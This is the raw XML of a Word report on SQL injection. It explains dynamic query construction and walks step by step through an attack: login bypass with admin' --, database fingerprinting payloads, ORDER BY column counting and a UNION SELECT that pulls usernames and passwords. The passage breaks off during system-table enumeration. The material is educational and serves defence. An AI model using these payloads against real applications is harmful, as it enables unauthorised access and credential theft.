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61C9D" w:rsidRPr="00022801" w:rsidRDefault="002D059A" w:rsidP="00022801">
      <w:pPr>
        <w:spacing w:before="1440" w:after="200"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022801">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>SQL INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Introduction to SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection (SQLi) is one of the oldest, most prevalent, and most dangerous web application vulnerabilities in existence. It has consistently ranked in the OWASP Top 10 list of critical web application security risks for over two decades, and continues to be responsible for massive data breaches worldwide.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection occurs when an attacker is able to insert or "inject" malicious SQL code into a query that an application sends to its database. If successful, the attacker can read sensitive data from the database, modify or delete data, execute administration operations on the database, and in some cases, issue commands to the underlying operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>This report provides a thorough step-by-step breakdown of how SQL injection attacks work, the different types of attacks, how attackers discover and exploit vulnerabilities, and — critically — how to prevent them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="00E61C9D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Background: How SQL Queries Work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Before understanding SQL injection, it is essential to understand how web applications interact with databases through SQL (Structured Query Language).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Normal Application Flow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>When a user submits a login form, the application typically constructs a SQL query dynamically by concatenating user input directly into the query string. For example, a login query might look like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>alice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' AND password = 'secret123';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>This query asks the database: "Return all rows from the users table where the username is '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>alice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' and the password is 'secret123'." If a row is returned, the user is authenticated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 The Danger of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Unsanitized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Input</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerability arises when the application does not sanitize or validate user input before embedding it into a SQL query. The database cannot distinguish between the intended SQL structure and injected malicious code — it simply executes whatever query it receives.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="00E61C9D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. SQL Injection: Step-by-Step Attack Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The following section walks through a complete SQL injection attack from initial reconnaissance through exploitation, as an attacker would experience it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1: Reconnaissance — Identifying Potential Entry Points</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The first step in any SQL injection attack is identifying input fields that interact with a backend database. Attackers look for:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Login forms (username and password fields)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Search boxes and filter inputs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>URL parameters (e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>, ?id</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>=5 or ?category=electronics)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HTTP headers such as User-Agent, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, or Cookie values</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Hidden form fields and POST parameters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>A simple test is to insert a single quote character into a field and observe the response:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Input: '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If the application throws a database error such as "You have an error in your SQL syntax", this strongly indicates the input is being embedded </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unsanitized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> into a SQL query — a clear sign of vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2: Probing — Confirming the Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Once a potential entry point is found, the attacker probes to confirm the injection and understand the database behavior. Classic probing payloads include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' OR 1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin' --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>For example, injecting into a login form:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Username: admin' --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Password: anything</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>This transforms the SQL query into:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE username = 'admin' --' AND password = 'anything';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The double-dash (--) is a SQL comment, which causes everything after it to be ignored. The password check is bypassed entirely, and the attacker is logged in as 'admin' without knowing the real password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3: Fingerprinting — Identifying the Database Type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Different database systems (MySQL, PostgreSQL, MSSQL, Oracle, SQLite) have slightly different SQL syntax. Attackers fingerprint the database to craft appropriate payloads. Common techniques include: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E61C9D">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61C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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61C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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61C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61C9D">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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>' OR 1=1 --</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Returns true</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL / MSSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61C9D">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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>' OR 1=1 #</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Returns true</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61C9D">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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>'; SELECT 1,2,3 --</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Column count test</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Multiple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61C9D">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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>' AND 1=</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CONVERT(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>int,'a</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>') --</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Type error</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MSSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E61C9D">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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>' AND 1=1 AND ROWNUM=1 --</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ROWNUM keyword works</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C9D" w:rsidRDefault="002D059A">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="00E61C9D">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 4: Extraction — Reading Data with UNION Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Once the vulnerability is confirmed and the database is fingerprinted, the attacker uses UNION-based injection to extract data from other tables. A UNION attack works by appending a second SELECT statement whose results are returned alongside the original query.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>First, the attacker determines the number of columns in the original query:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' ORDER BY 1 --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>no error)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' ORDER BY 2 --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>no error)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' ORDER BY 3 --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>error: column 3 does not exist)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>This reveals the original query returns 2 columns. The attacker then crafts a UNION payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' UNION SELECT username, password FROM users --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The application now returns both the original results and the entire contents of the users table — including all usernames and passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Step 5: Escalation — Accessing Sensitive System Tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Beyond extracting application data, attackers target database metadata tables to map the entire database structure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- MySQL: list all tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E61C9D" w:rsidRDefault="002D059A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
